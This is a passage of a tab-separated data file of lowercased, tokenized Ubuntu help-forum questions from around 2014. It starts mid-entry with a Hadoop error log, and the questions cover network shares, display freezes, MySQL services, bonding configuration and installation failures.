jobtracker error log for this job is host=null user=hadoop hadoop_user=null last hadoop input : |null| last tool output : |null| date : thu mar 06 15:51:51 ist 2014 java.io.ioexception : broken pipe at java.io.fileoutputstream.writebytes ( native method ) at java.io.fileoutputstream.write ( fileoutputstream.java:297 ) at java.io.bufferedoutputstream.write ( bufferedoutputstream.java:122 ) at java.io.bufferedoutputstream.flushbuffer ( bufferedoutputstream.java:82 ) at java.io.bufferedoutputstream.write ( bufferedoutputstream.java:126 ) at java.io.dataoutputstream.write ( dataoutputstream.java:107 ) at org.apache.hadoop.streaming.io.textinputwriter.writeutf8 ( textinputwriter.java:72 ) at org.apache.hadoop.streaming.io.textinputwriter.writevalue ( textinputwriter.java:51 ) at org.apache.hadoop.streaming.pipemapper.map ( pipemapper.java:110 ) at org.apache.hadoop.mapred.maprunner.run ( maprunner.java:50 ) at org.apache.hadoop.streaming.pipe java.io.ioexception : log : null . . . please suggest me how to get input from hadoop streaming input for my matlab script input , similarly output .
430256	network share write protected	i use the `` freefilesync '' folder syncronisation tool to synch my laptop with the office server . my ubuntu version is 13.10 . when i use nautilus to connect the server with smb// : { ipaddress } / { share name } everything works properly , but i had to find where the share was hidden , and googling somehow i found it in /run/user/1000/gvfs . using this location with my programs , like freefilesync '' gives a good result , and i 'm able to read/write files both sides . but if i try to mount the network share by myself , typing in the terminal : sudo mount // { ipaddress } / { network share } -t cifs /mnt/ < share name > -o `` username=xxxxxxxxxxxx , password=yyyy '' i get a share that is write protected , and my programs are unable to write on the network share . yes , i can use the default nautilus mount addressing ( /run/user/1000/gvfs ... . ) but i usually prefer to understand what i do . thanks a lot for your answer . update - i should add that i even added a rw option to the mount command , writing : sudo mount // { ipaddress } / { network share } -t cifs /mnt/ < share name > -o rw , '' username=xxxxxxxxxxxx , password=yyyy '' but with same result , no write allowed .
430258	how do i install quick 'n easy web builder 2	i purchased quick 'n easy web builder 2 from ubuntu software center . but ubuntu software center could not / will not install it . i looked at software-center.ubuntu.com and i can see the ppa fingerprint and license key . how do i install quick 'n easy web builder 2 ?
430263	black screen and cursor only when i log in in 13.10	when i log in to my user account , or guest or any other , i get a black screen and i can see a cursor icon and move it . but nothing else is on screen , ca n't run commands with alt-f2 , meta keys do n't do anything it seems . i can switch to another console , but the graphical interface does not work . even if i create another user account or guest account , it 's still the same . i 've installed gnome from terminal ( with lightdm though ) and it is the same . what could be the problem here , how can i reset stuff ? i have tried installing gnome , switching to gdm etc . i have ubuntu 13.10 installed ( about 10 days ago ) . did n't do anything funky recently or install new software before the incident , it just got b0rked suddenly . update : when i startx from 'nother console , the log says that the stuff is initializing . the last thing done is i see : loading extension glx ( ii ) [ kms ] kernel modesetting enabled . the xkeyboard keymap compiler ( xkbcomp ) reports : > warning : type `` one_level '' has 1 levels , but < ralt > has 2 symbols > ignoring extra symbols errors from xkbcomp are not fatal to the x server
430264	unable to load a kernel module in ubuntu 13.10	i 'm unable to load the it87 kernel module in ubuntu 13.10 at boot time . if i put the name of the module it87 in /etc/modules i 'm getting an error message . ( update ) it seem that the error message is gone but the module is n't loaded . but when i do sudo modprobe it87 on the command line the module is loaded without any error . also ; how to figure out where i could read the exact messages other than in dmesg ? tia carlo
430268	install google play music plugin for rythmbox on ubuntu 12.04	i 've tried to install google play music plugin for rythmbox . i 've first tried to install it via ppa as described here . after executing sudo apt-get install rhythmbox-gmusic i get an error message wich says ( might not be the correct output in english since i hadd to translate it from german , but i think everyone knows whats happening ) packagelists are read ... done dependencytree gets build statusinformation are read ... done some packages could not be installed [ ... ] the following information might help you , to solve your problem : the following packages have unmet dependencies rhythmbox-gmusic : depends on : python-validictory but is not installable e : problems can not be corrected , you have hold back damaged packages so after this i 've tried installing the plugin via via pip as described here this succeeded but i 've try to enable the plugin i get a warning sign ( red sign with wide horizontal line ) like described in this question note : i 've tried all 3 solutions given in this thread but if i try installing python-validictory with sudo apt-get install python-validictory i get following output ( again translated from german ) packagelists are read ... done dependencytree gets build statusinformation are read ... done package python-validictory is not available , but is referenced in another package . this can mean that the package is missing , that it got redeemed or is only available from another source . e : package âťpython-validictoryâť has no installation candidate can someone please tell me how i can get python-validictory or how i get this plugin to work . thank you in advance . [ update ] i forgot to mention that i also looked at this site but do n't know what these packages can all be installed fron universe/main . means .
430271	math equations in impress	i made an impress presentation and saved it as powerpoint . then , in powerpoint , i added an equation to one of the text boxes . back in impress , i can see the text and equation just like in powerpoint , but i can no longer edit the text . my questions are : how can i recover the text from the textbox with the equation ? how can i write a math equation in impress in a cross-platform manner ?
430272	execute script before ubuntu system get shutdown	i want to run my script before the ubuntu system get shutdown . so for that i have created my script inside /etc/init.d directory and make it executable i.e . chmod +x k99pr.sh . also created another script inside the /etc/rc0.d and make it executable like above . and write my logic in that script . now i want to symbolic link to the /etc/rc0.d/k99prak.sh from init.d/k99pr.sh please advice me how to write the symbolic link for above script . i am new for the scripting . this is my script files /etc/init.d/k99pr.sh # ! /bin/bash i want add here the symbolic link this is another script : /etc/rc0.d/k99pra.sh # ! /bin/bash my logic thanks .
430273	how to connect a raw serial terminal to a bluetooth connection without sudo ?	how to i connect a raw serial terminal to a bluetooth connection ? brian 's answer in the above link works but i need to use sudo to read or write to the serial port . how do i make it accessible without elevated privileges ?
430274	unable to connect sata device on vm with ubuntu as os using vmware	i am getting the following error when i install the virtual machine : can not connect the virtual device `sata0:1` because no corresponding device is available on the host . do you want to try to connect this virtual device every time you power on the virtual machine ? host os : windows 8 guest os to be installed on vmware : ubuntu 32-bit network : wired network
430277	ubuntu 13.10 missing dependency on libxtables.so.7	i 'm running 13.10 32-bit with connman_1.15-0ubuntu2_i386.deb , iptables ( 1.4.18-1.1ubuntu1 ) , libxtables10 connman fails and when i try to restart it i get the following error - /usr/sbin/connmand : error while loading shared libraries : libxtables.so.7 : can not open shared object file : no such file or directory i contracted this problem about 2 weeks ago when i accepted an upgrade . any ideas ? its depressing me . thanks . i found a solution but i can not answer my own question for 8 hours and so i add it here . if someone can review it then i will appreciate it . so i do n't know why or how i got into this missing dependency problem that was last reported for wheezy and i am most confused how no one else hit the same , but i have fixed it by recompiling connman . here is the steps i followed . if i messed up then please advise but `` it worked for me '' - famous last words - build nettle required by gnutls seems if you dont install gmp first then nettle will build but you get problems later . i also downloaded p11-kit for good luck . sudo apt-get install libgmp-dev sudo apt-get install p11-kit-dev gnutls complained that it needed version 2.7 of nettle . the newest version of nettle is not compatible . versions will change . its cool that the config of gnutls states the version it needs . watch out for this . as a kid i was always getting stung by nettles . perhaps now will be no different . doh ! wget http : //www.lysator.liu.se/~nisse/archive/nettle-2.7.tar.gz tar zxvf nettle-2.7.tar.gz cd nettle-2.7 autoreconf -i ./configure -- enable-shared make sudo make install gnults will complain about a missing root key . i calmed its nerves via the following - sudo apt-get install unbound-anchor sudo mkdir /etc/unbound unbound-anchor -a `` /etc/unbound/root.key '' build gnutls download source from www.gnutls.org/ cd gnutls- < version > ./configure make sudo make install build connman sudo apt-get install xtables-addons-common sudo apt-get install xtables-addons-dkms ./configure -- prefix=/usr -- sysconfdir=/etc -- localstatedir=/var make sudo make install after all this i found that the libgnutls gets installed in usr/local/lib but it appears that this is not in the library path and so i created the following symbolic link to fix it . should /usr/local/lib be in the standard search path ? hmm . sudo ln -s /usr/lib/libgnutls.so.28 /usr/local/lib/libgnutls.so.28 now i can restart connman and on reboot it no longer crashes . cool .
430279	in lubuntu autostart dual screen works properly only after every shutdown and boot , but it does not show properly after reboot	i have lubuntu 13.10 in a p4 laptop with external screen . i have set arandr on startup to open dual screen in extend mode . when i shutdown computer and i boot again , the dual screen works fine . but when i reboot my computer without shutdown first , the dual screen is not working properly and i have to set it manually using arandr why does this happen ?
430284	ubuntu 13.10 bonding	so , i have installed ubuntu 13.10 and trying to aggregate couple of my interfaces . first that seems to me suspicious is that my interfaces are called in unusual way : p1p1 and p1p2 instead of usual eth0 & eth1 . so , i installed ifenslave , and tried to make bond0 interface and that is my second point : when i boot my server there is a lot of fail messages saying `` can not create virtual network interface '' . networking service is stopped and fail to start for unknown reasons . ifconfig -a show me all of my interfaces including bond0 , but when i 'm trying to ifup bond0 it says : /etc/networking/interfaces:21 : unknown address type . whats the reason of this problem ? i read a lot of manuals , do whatever it written about but in vain . here 's my /etc/networking/interfaces : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface # auto p1p1 # iface p1p1 inet static # address 10.0.9.15 # netmask 255.255.255.0 # network 10.0.9.0 # broadcast 10.0.9.255 # gateway 10.0.9.254 # # dns-* options are implemented by the resolvconf package , if installed # dns-nameservers 10.0.9.6 # dns-search school49-tver.ru auto bond0 iface bond0 itet static address 172.16.0.2 netmask 255.255.255.128 network 172.16.0.0 broadcast 172.16.0.127 gateway 172.16.0.1 dns-nameservers 10.0.9.6 dns-search school49-tver.ru bond-mode 4 bond-miimon 100 bond-lacp-rate 1 bond-slaves p1p1 p1p2â # auto bond0.40 auto p1p1 iface p1p1 inet manual bond-master bond0 auto p1p2 iface p1p2 inet manual bond-master bond0
430285	graphical problems with 13.10 / gnome on macbook pro 9.1 ( 13 '' , mid 2012 )	i have a fresh saucy installation on my macbook pro with a 'little ' problem : when i open gnome-terminal , i only see the borders of the window but no window content . purging the package gnome-terminal and re-installing it had no effect . i 'm able to get terminal access via xterm . here is was lspci listed under vga : vga compatible controller : intel corporation 3rd gen ( rev 09 ) ... kernel driver in use : i915 for me that looks correct ( ? ) since osx also listed intel hd graphics as graphics card in use . when starting a unity session i have similar graphical problems with gnome-terminal . when i launch gnome-terminal from xterm there were no observable error outputs.. does anybody have an idea or a hint how to proceed ?
430291	error starting service	i just installed openerp by following the guidelines available on google and youtube but when i try to start the service it gives me the following error , can you please suggest what is going wrong . > ubuntu @ ip-172 : ~ $ openerp-server 2014-03-06 12:00:35,954 9197 info ? > openerp : openerp version 7.0-20140306-001044 2014-03-06 12:00:35,955 > 9197 info ? openerp : addons paths : > /usr/lib/pymodules/python2.7/openerp/addons 2014-03-06 12:00:35,955 > 9197 info ? openerp : database hostname : localhost 2014-03-06 > 12:00:35,955 9197 info ? openerp : database port : 5432 2014-03-06 > 12:00:35,955 9197 info ? openerp : database user : ubuntu 2014-03-06 > 12:00:36,441 9197 info ? openerp.addons.google_docs.google_docs : gdata > lib version ` % s gdata-python/2.0.14` detected exception in thread > thread-1 : traceback ( most recent call last ) : file > `` /usr/lib/python2.7/threading.py '' , line 551 , in __bootstrap_inner > self.run ( ) file `` /usr/lib/python2.7/threading.py '' , line 504 , in run > self.__target ( *self.__args , **self.__kwargs ) file `` /usr/lib/pymodules/python2.7/openerp/service/wsgi_server.py '' , line > 436 , in serve > httpd = werkzeug.serving.make_server ( interface , port , application , threaded=true ) file > `` /usr/lib/python2.7/dist-packages/werkzeug/serving.py '' , line 399 , in > make_server > passthrough_errors , ssl_context ) file `` /usr/lib/python2.7/dist-packages/werkzeug/serving.py '' , line 331 , in > __init__ > httpserver.__init__ ( self , ( host , int ( port ) ) , handler ) file `` /usr/lib/python2.7/socketserver.py '' , line 408 , in __init__ > self.server_bind ( ) file `` /usr/lib/python2.7/basehttpserver.py '' , line 108 , in server_bind > socketserver.tcpserver.server_bind ( self ) file `` /usr/lib/python2.7/socketserver.py '' , line 419 , in server_bind > self.socket.bind ( self.server_address ) file `` /usr/lib/python2.7/socket.py '' , line 224 , in meth > return getattr ( self._sock , name ) ( *args ) error : [ errno 98 ] address already in use > > 2014-03-06 12:00:36,810 9197 info ? openerp : openerp server is > running , waiting for connections ... at the end line it says waiting for connections but it does n't give me the prompt , i have to use crt+c/z
430292	using ubuntu as - a pc , nas , cctv storage . is this possible ?	basically i have a machine i have been given , wondering if its possible to install ubuntu onto it and have it as a normal pc for basic things such as web browsing and such then also use it as a nas drive - itunes library - cctv storage ( wifi ip ) ? i know its asking alot just wondering what i can do ? i primarily use my macs , but would like all devices to access it , ipads , smart phones , tv 's , windows machines etc ... it will be used by 4/5 devices at most at one time . thanks jamie
430294	reisub not working when ubuntu freezes	i am using 12.04 lts on a dell inspiron 15 3521 . whenever the system hangs up with keyboard becoming unresponsive , reisub does not give any results . now i edited etc/sysctl.conf file as was suggested in an answer to a similar question with no positive change whatsoever . also my laptop only has a prntscr key with no specific sysrq key designated as far as i know .
430299	can i manage system resources ubuntu ?	i want to format and partition drives with ubuntu . is the os a fully integrated thing like windows ?
430306	no reaction on service mysql start , init script works	after upgrading ubuntu from 12.04 to 13.10 , the mysql server ( now 5.5 ) does not start/stop with service mysql start|stop . when typing /etc/init.d/mysql start , everything works fine . once it does nothing , when pressing ^c and retrying it says : start : job is already running : mysql while it is not . after trying to start the service with the upstart syntax , i took a look into the htop statuses : 19973 root 20 0 2272 552 480 s 0.0 0.0 0:00.00 /bin/sh /usr/sbin/service mysql restart 19979 root 20 0 6280 1064 936 s 0.0 0.0 0:00.00 stop mysql and it stays like this .
430309	alt key opens command line	i 'm running windows 8.1 through virtual box in ubuntu 12.4 and one of my ( many ) problems is when i press alt key command line opens in my host . after this many things stop working correctly until i exit full screen mode and close the command line . i can not do a normal copy/paste operation after hit alt , for example , because the host opens command line . i have installed compizconfig settings manager but i can find a place where i can change this behavior . i was looking in compizconfig settings manager > general > general options > key bindings but when i filter for alt key , none of the showed options is the alt key alone . it 's drive me crazy ! can you help me ? thanks
430313	getting error message from cron job ?	php warning : php startup : unable to load dynamic library '/usr/lib/php5/20121212/pdo_mysql.so ' - /usr/lib/php5/20121212/pdo_mysql.so : undefined symbol : pdo_parse_params in unknown on line 0
430315	can i play this game with newrez ?	i have a netbook hp mini with ubuntu 12.04 installed . i want to play 0 ad on my netbook . i saw the minimum system requirements on 0 ad official site where the minimum resolution mentioned is 1024x768 . but , my netbook only reach 1024x600 . so , if i use newrez to increase the resolution . will the game work ?
430317	wireless not working on ubuntu 12.04 hp probook 445	description : ubuntu 12.04.4 lts gnome-3.4.2 kernel-3.2.0-55-generic x86_64 cpu-amd a6-5350m apu with radeon ( tm ) hd graphics $ lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root complex 00:01.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] richland [ radeon hd 8450g ] 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller 00:04.0 pci bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root port 00:05.0 pci bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root port 00:07.0 pci bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor root port 00:10.0 usb controller : advanced micro devices , inc. [ amd ] fch usb xhci controller ( rev 09 ) 00:10.1 usb controller : advanced micro devices , inc. [ amd ] fch usb xhci controller ( rev 09 ) 00:11.0 sata controller : advanced micro devices , inc. [ amd ] fch sata controller [ ahci mode ] ( rev 40 ) 00:12.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) 00:12.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) 00:13.0 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) 00:13.2 usb controller : advanced micro devices , inc. [ amd ] fch usb ehci controller ( rev 11 ) 00:14.0 smbus : advanced micro devices , inc. [ amd ] fch smbus controller ( rev 16 ) 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd ] fch lpc bridge ( rev 11 ) 00:14.4 pci bridge : advanced micro devices , inc. [ amd ] fch pci bridge ( rev 40 ) 00:14.5 usb controller : advanced micro devices , inc. [ amd ] fch usb ohci controller ( rev 11 ) 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 0 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 1 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 2 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 3 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 4 00:18.5 host bridge : advanced micro devices , inc. [ amd ] family 15h ( models 10h-1fh ) processor function 5 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0c ) 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 03:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie 03:00.1 bluetooth : ralink corp. rt3290 bluetooth $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 04f2 : b3c8 chicony electronics co. , ltd $ lspci -nn | grep ralink 03:00.0 network controller [ 0280 ] : ralink corp. rt3290 wireless 802.11n 1t/1r pcie [ 1814:3290 ] 03:00.1 bluetooth [ 0d11 ] : ralink corp. rt3290 bluetooth [ 1814:3298 ] $ ifconfig eth0 link encap : ethernet hwaddr a4:5d:36 : ca:92 : df inet addr:192.168.1.2 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :a65d:36ff : feca:92df/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5250 errors:0 dropped:0 overruns:0 frame:0 tx packets:5259 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5840586 ( 5.8 mb ) tx bytes:650786 ( 650.7 kb ) interrupt:50 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:40 errors:0 dropped:0 overruns:0 frame:0 tx packets:40 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3172 ( 3.1 kb ) tx bytes:3172 ( 3.1 kb ) $ iwconfig lo no wireless extensions . eth0 no wireless extensions . $ lsmod module size used by wl 3074895 0 cfg80211 205774 1 wl lib80211 14381 1 wl vesafb 13844 1 joydev 17693 0 parport_pc 32866 0 ppdev 17113 0 bnep 18281 2 snd_hda_codec_idt 70795 1 binfmt_misc 17540 1 snd_hda_codec_hdmi 32474 0 rfcomm 47604 12 hp_wmi 18092 0 sparse_keymap 13890 1 hp_wmi dm_multipath 23275 0 snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_hda_intel 33719 3 snd_hda_codec 127706 3 snd_hda_codec_idt , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 17764 1 snd_hda_codec psmouse 97519 0 serio_raw 13211 1 uvcvideo 72627 0 snd_pcm 97275 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec k10temp 13166 0 snd_seq_midi_event 14899 1 snd_seq_midi videodev 98259 1 uvcvideo v4l2_compat_ioctl32 17128 1 videodev i2c_piix4 13301 0 snd_seq 61929 2 snd_seq_midi , snd_seq_midi_event video 19651 0 wmi 19256 1 hp_wmi snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq mac_hid 13253 0 rtbth 76648 3 bluetooth 180113 23 bnep , rfcomm , rtbth snd 79041 16 snd_hda_codec_idt , snd_hda_codec_hdmi , snd_rawmidi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_seq , snd_timer , snd_seq_device fglrx 7535410 96 r8168 248895 0 soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm kbccmnd 12808 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp disable_mmc 13007 0 dm_raid45 78155 0 xor 12894 1 dm_raid45 dm_mirror 22203 0 dm_region_hash 20961 1 dm_mirror dm_log 18564 3 dm_raid45 , dm_mirror , dm_region_hash btrfs 653061 0 zlib_deflate 27139 1 btrfs libcrc32c 12644 1 btrfs rts5229 319751 0 $ sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 0c serial : a4:5d:36 : ca:92 : df size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8168 driverversion=8.035.00-napi duplex=full ip=192.168.1.2 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:50 ioport:4000 ( size=256 ) memory : d5000000-d5000fff memory : d0000000-d0003fff *-network unclaimed description : network controller product : rt3290 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:03:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d3010000-d301ffff
430322	multiple keyboard layouts	just upgraded to ubuntu 13.10 to have that out of the way when 14.04 comes . i am working with an apple keyboard , which for unknown reasons has alt/cmd keys switched ( and a few other weird things ) . in 13.04 i used setxkbmap to set the settings i needed to have the keyboard work as normal - however , with 13.10 there 's apparently some monitoring going on that resets the keyboard layout on any process switch . which means i can happily type away in one window , use alt+tab to switch to another window , then try using alt+tab to switch back , only to realize that ubuntu has reset the changes made by setxkbmap . my problem is that i use different keyboards : the apple keyboard and the native laptop keyboard . when the apple keyboard is attached that should be the active configuration - otherwise the native keyboard should be . i do n't mind switching manually between the two , but i 'll be damned if i have to change settings through a menu that 's five clicks away . it 's a computer and it 's supposed to be used for automating stuff . so , i 'm looking for solutions that will let me use both keyboards ( obviously not at the same time ) without having to run scripts every time i switch windows . lacking that , some way of venting my anger at the developers who did that bad a job of this .
430324	ec2 instance suddenly refused our key pair	i 've been connecting to my aws ec2 instance without any problem using the .ppk file provided by amazon . the security group was set up properly enabling port 22 , etc. , etc. , and everything worked just fine until today when trying to connect to the server and it refused the connection giving the message : disconnected no supported authentication methods available ( server : sent publickey ) . i checked everything and no changes on the configuration of the instance nor the putty were performed , thus there 's no reason ( apparently ) to refuse the connection . this happened in a test environment , but if something like that happened in a production environment it would be critical . thanks .
430328	can not install and run eclipse on ubuntu 12.04	hi guys well i 'm new to ubuntu my first time try to install and set environment stuffs on ubuntu . i installed jdk 7 from webupd installer and installed the default setting package . i also installed ant 1.9.3 which should be installed properly . firstly i followed the instructions which i got from google search , it said i just need to download the package and extract it and put it anywhere i want . but it turned out when i click the eclipse it just does n't work . nothing happened . so i did a lot of search , i finally followed this blog here i downloaded eclipse from the official site its a very neat instruction and i compared with many other instructions i got it seems it should work . but after i followed all of those steps i got the message like this : '' eclipse '' is not installed i read this , then added the `` -vm '' and `` /path/to/java '' thing into the eclipse.ini like this : -startup plugins/org.eclipse.equinox.launcher_1.3.0.v20130327-1440.jar -- launcher.library plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.200.v20140116-2212 -product org.eclipse.epp.package.java.product -- launcher.defaultaction openfile -showsplash org.eclipse.platform -- launcher.xxmaxpermsize 256m -- launcher.defaultaction openfile -- launcher.appendvmargs -vm /usr/lib/jvm/java-7-oracle/bin/java -vmargs -dosgi.requiredjavaversion=1.6 -xx : maxpermsize=256m -xms40m -xmx512m then i tried to run eclipse from terminal again ( with the command : eclipse ) . got the error msg like this : nini @ nini-vostro-3350 : ~ $ eclipse bash : /usr/bin/eclipse : can not execute binary file i totally do n't know what happened and have been working on this for the whole day . is there anyone can help me ? thank you very much .
430330	how to make an iso image for the current installed ubuntu ?	i usually install ubuntu 12.10 beside windows on the same machine , and sometimes i have a problem with windows 7 so i have to reinstall it and then reinstall ubuntu . when that happens i need to reinstall ubuntu and then reinstall every single program or application i had installed in the previous one which requires internet connection ( as i 'm not expert in linux ) and consume a lot of time i simply want to install ubuntu and install everything else i want and update whatever i 'm gon na update and customize the features i want once , then take a copy of all of this , like an image and burn it on a dvd so that when i want to reinstall ubuntu or install it on another machine , i just install it from that dvd directly and once installed i fined everything as i want to be , and do n't need to reinstall the programs , applications , and updates again . i do n't want to backup the packages then reinstall them again after installing.. i hope i made my question clear
430338	can not find crt1.o : no such file or directory	when i use this command : ./configure -- prefix= $ home/install the config.log show this . i am working on ubuntu64 . configure:1462 : checking for fortran 77 compiler default output configure:1465 : f77 conftest.f > & 5 ld : can not find crt1.o : no such file or directory ld : can not find crti.o : no such file or directory ld : can not find crtbegin.o : no such file or directory ld : can not find -lgcc configure:1468 : $ ? = 1 configure : failed program was : | program main | | end configure:1507 : error : fortran 77 compiler can not create executables see `config.log ' for more details .
430339	are there docs for creating a unity theme ?	for the last year or so i have been using kde . i am switching back to unity because i prefer the work flow while i 'm coding , i find it easier and faster to manage all that i am doing in unity . however i am missing the beauty of oxygen and after hacking on some unity themes i 'd like to try my hand at turning the existing oxtgen-gtk3 and oxygen-gtk2 themes that exist for kde users into a unity theme for ubuntu users . i can not seem to find any kind of manual or documentation for creating a unity theme . anyone that can point me in the right direction i would appreciate it greatly .
430354	ubuntu ca n't run sublime text 2 executable	i 've installed sublime text 2 on my ubuntu linux vm . the executable appears to be in /opt/sublime_text_2 . when i click on sublime_text executable it opens a new terminal window and does not open sublime text . if i enter from the terminal : /opt/sublime_text_2/sublime_text a new terminal window pops up with the following : # ! /bin/bash /opt/sublime_text_2/sublime_text -- class=sublime-text-2 `` $ @ '' and sublime text does not open
430355	configure a network interface into promiscuous mode	i am working on ubuntu 12.04 lts server on vmware workstation . i need to configure my network interface to work in promiscuous mode . this is my configuration auto eth1 iface eth1 inet manual up ip address add 0/0 dev $ iface up ip link set $ iface up up ip link set $ iface promisc on down ip link set $ iface promisc off down ip link set $ iface down and when i execute netstat -i the flag is bmru is my configuration correct or do i need to execute some extra commands .
430360	install lirc-0.8.7.tar.bz2 in ubuntu 13.10	i downloaded from the website of lirc , lirc-0.8.7.tar.bz2 the version and would like to install it on my ubuntu 13.10 . i want to install this version lirc-0.8.7 on my ubuntu 13.10 and not come down in the software center 0.9.0 . i downloaded the lirc-0.8.7.tar.bz2 file but not install it . how to install lirc-0-8.7.tar.bz2 in ubuntu 13.10 ? thank you .
430362	ide/compiler for c or c++ programming	is there any software that supports on c or c++ programming ? then , if it so , how to run , compile or debug your own code to display its output via terminal ( linux/ubuntu ) or cmd ( windows )
430365	where do i find the applications menu editor ?	in a ubuntu forum , i was researching on how to open wine programs . i found some instructions that may be useful . i can successfully download the programs , but i do n't know how to open them . here the instructions . open applications menu editor applications -- > system tools - > application menu editor click the new menu button . fill out wine apps ( or whatever you want ) for the name . and hit enter . you can add an icon if you wish , i prefer to keep mine default for now.. click on the new menu item you just created . now click the button that says new entry . fill out the form the way you like . as for the command . youll want to enter : wine /home/ { user } /.wine/drive_c/program\ files/ { path to your program.exe } choose an icon if you wish , again i didnt due to preference . and lastly you want to click the 'run in terminal ' button . close the menu editor and voila ! you now have a quick and easy way to launch your favorite windoz programs ^_^ . i think this is a good howto.. considering if its one youll use alot ... doing this will save you quite some time in the end.. i keep getting stuck on the first step . i ca n't seem to find the applications menu editor . i know that this is probably a simple question , but could someone tell me where to find that ? again , thank you in advance for all of your help .
430368	how to force user to type username & password for lxdm login window lubuntu	is it possible to remove the drop down box with the list of users on the login window to lubuntu and replace it with a text field that forces the user to type in both the username and password . currently you are able to select a username from the drop down menu and i would like to disable this feature . i have been unable to find any answers to this in the forums so far . thank you
430377	ca n't install ubuntu on asus rampage extreme iv	i 'm having serious problems installing ubuntu on my asus rampage iv extreme/i7 , in fact in any version of linux at all . here are the steps i 'm following : direct boot kubuntu 13.10 from dvd - sometimes installer starts , sometimes not ( freeze on kubuntu logo ) - when it starts it installs just fine , after that login screen shows after login freeze while being on `` hard drive '' icon , however once it started do n't know why ... direct boot ubuntu 13.10 - freeze and stop reading from cd at install screen ( this one with passing dots ) . 12.04 - same thing in both cases . wubi 12.4 from windows installed just to do it - install on windows completes fine , after restart : `` to show other install options press esc now '' then shows `` 0 '' and freezes . recommended by manufacturer 11.4 same thing . ole/opensuse/other redhat based - `` waiting for hardware to initialize '' or `` starting udev ... '' before installation , then freezes . tried with different combinations of bios settings/install options like nomodprobe but nothing worked . is system incapable of handling any linux ? edit - specs : intel core i7 4930k kingston hyperx ddr3 4x 8gb 1600 mhz cl9 xmp beast geforce with cuda gt210 asus 1gb silent hdmi & dvi ( pci-e ) ( ddr3 ) wd velociraptor 500gb wd5000hhtz ( sata/600,64mb ) x2 lite-on dvd /-rw ihas122-04 sata
430379	how to install ubuntu ultimate 3.8 on an acer laptop ?	when i install ubuntu ultimate 3.8 on an acer laptop , the following error stops the installation : ( initramfs ) stdin mount : mounting /dev/loop0 on //filesystem.squashfs faild : invalid arguments can not mount /dev/loop0 ( /cdrom/casper/filesystem.squashfs ) on //filesystem.squashfs what is going wrong ? how can i fix it ?
